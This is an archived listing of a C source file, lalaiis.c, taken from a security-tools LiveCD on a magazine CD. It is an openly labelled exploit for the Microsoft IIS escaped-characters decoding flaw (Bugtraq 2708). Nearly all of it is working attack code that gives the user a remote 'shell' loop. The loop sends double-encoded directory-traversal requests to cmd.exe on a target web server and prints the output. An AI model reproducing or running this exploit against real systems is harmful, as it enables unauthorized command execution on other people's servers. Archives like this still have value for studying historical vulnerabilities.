Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / iis / lala.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 3.0 KB | 125 lines

/* lalaiis.c (or Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability) Bugtraq id: 2708 It gives you a "shell-like" environment to test your IIS servers Coded by MovAX <movax@softhome.et> Greetz to: lala, HeH! Magazine staff <http://www.dtmf.com.ar/digitalrebel> Fuckz to: Feel free to add your handle to this section. */ #include <stdio.h> #include <netdb.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <signal.h> #include <errno.h> #include <fcntl.h> void usage(void) { fprintf(stderr, "\nusage: ./lalaiis website> vulnerable_directory"); fprintf(stderr, "\nwhere vulnerable_directory can be any 'scriptable' dir (like scripts msadc)"); fprintf(stderr, "\nex: ./lalaiis www.foo.bar scripts\n"); exit(-1); } int main(int argc, char **argv) { int i, le_socket, le_connect_error, le_timeout ; int timeout=80; int port=80; char temp[1]; char host[512]=""; char command[1024]=""; char request[8192]="GET /"; struct hostent *he; struct sockaddr_in s_addr; printf(":: lalaiis.c exploit. Coded by MovAX\n"); if (argc < 3) usage(); strncpy(host, argv[1], sizeof(host)); if(!strcmp(host, "")) { fprintf(stderr, "put a damn server\n"); usage(); } printf("\n:: Destination host > %s:%d\n", host, port); if((he=gethostbyname(host)) == NULL) { fprintf(stderr, "put a damn VALID server\n"); usage(); } for (;;) { command[0]=0; printf("\nlala_shell> "); if(fgets(command, sizeof(command), stdin) == NULL) perror("gets"); command[strlen(command)-1]='\0'; if(!strcmp("logout", command)) exit(-1); for(i=0;i<strlen(command);i++) {if(command[i]==' ') command[i]='+'; } strncpy(request, "GET /", sizeof(request)); strncat(request, argv[2], sizeof(request) - strlen(request)); strncat(request, "/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+", sizeof(request) - strlen(request)); strncat(request, command, sizeof(request) - strlen(request)); strncat(request, " HTTP/1.1\n", sizeof(request) - strlen(request)); strncat(request, "host:" ,sizeof(request) - strlen(request)); strncat(request, argv[1], sizeof(request) - strlen(request)); strncat(request, "\n\n", sizeof(request) - strlen(request)); s_addr.sin_family = AF_INET; s_addr.sin_port = htons(port); memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr, sizeof(s_addr.sin_addr)); if((le_socket=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket\n"); exit(-1); } alarm(le_timeout); le_connect_error = connect(le_socket,(struct sockaddr *)&s_addr,sizeof(s_addr)); alarm(0); if(le_connect_error==-1) { perror("connect"); exit(-1); close(le_socket); } send(le_socket, request, strlen(request), 0); while(recv(le_socket,temp,1, 0)>0) { alarm(timeout); printf("%c", temp[0]); alarm(0); } } close(le_socket); return 0; }